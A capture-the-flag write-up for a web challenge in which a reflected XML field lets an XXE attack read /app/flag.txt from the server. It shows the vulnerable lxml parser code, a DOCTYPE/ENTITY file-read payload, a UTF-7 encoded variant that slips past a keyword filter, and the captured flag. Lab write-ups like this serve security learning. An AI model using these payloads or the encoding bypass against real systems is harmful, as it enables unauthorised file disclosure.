Ip#

• http://<username>.playat.flagyard.com

Here we have a simple UI which kinda works

However it wont work with any other inputs other than numbers

Lets Observe the challenge code

TIP

Lets BreakDown Step by step

Vulnerable code (excerpt)

1
parser = etree.XMLParser(resolve_entities=True)
2
doc = etree.fromstring(xml_data, parser)
3
# crude filter:
4
if b"<!DOCTYPE" in xml_data or b"+ADwAIQ-ENTITY" in xml_data:
5
    return "I'm watching you *-*"

resolve_entities=True enables entity resolution. The filter checks only for the exact bytes <!DOCTYPE and a single encoded string — it is insufficient.

Proof of Concept (PoC) Goal: Read /app/flag.txt and have the content reflected in the XML response.

Why this works: lxml will expand declared entities when resolve_entities=True. The app reflects the <weight> / <height> values in the response XML, so injecting &xxe; into <weight> will cause the file content to appear in the returned XML.

Example payload (bypass simple filter) Note: The filter checks for the exact bytes <!DOCTYPE, so using case variation like or adding whitespace/line breaks will evade it.

1
<!--?xml version="1.0" ?--->
2
<!DOCTYPE   foo [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>

It seems that there is something preventing our attack. Looking at the source code

we can try to encode our payload to UTF-7 on cyberchef and then try to send it.

used payload after encoding

1
<?xml version="1.0" encoding="UTF-7"?>+ADw-+ACE-DOCTYPE+ACA-replace+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-ent+ACA-SYSTEM+ACA-+ACI-file:///app/flag.txt+ACI-+AD4-+ACA-+AF0-+AD4-+AA0-+AAo-+ADw-data+AD4-+ADw-weight+AD4-+ACY-ent+ADs-+ADw-/weight+AD4-+ADw-height+AD4-156+ADw-/height+AD4-+ADw-/data+AD4-

we got a flag

1
FlagY{c064bc53c601d52499ef381f5b5caabd}

challenge complete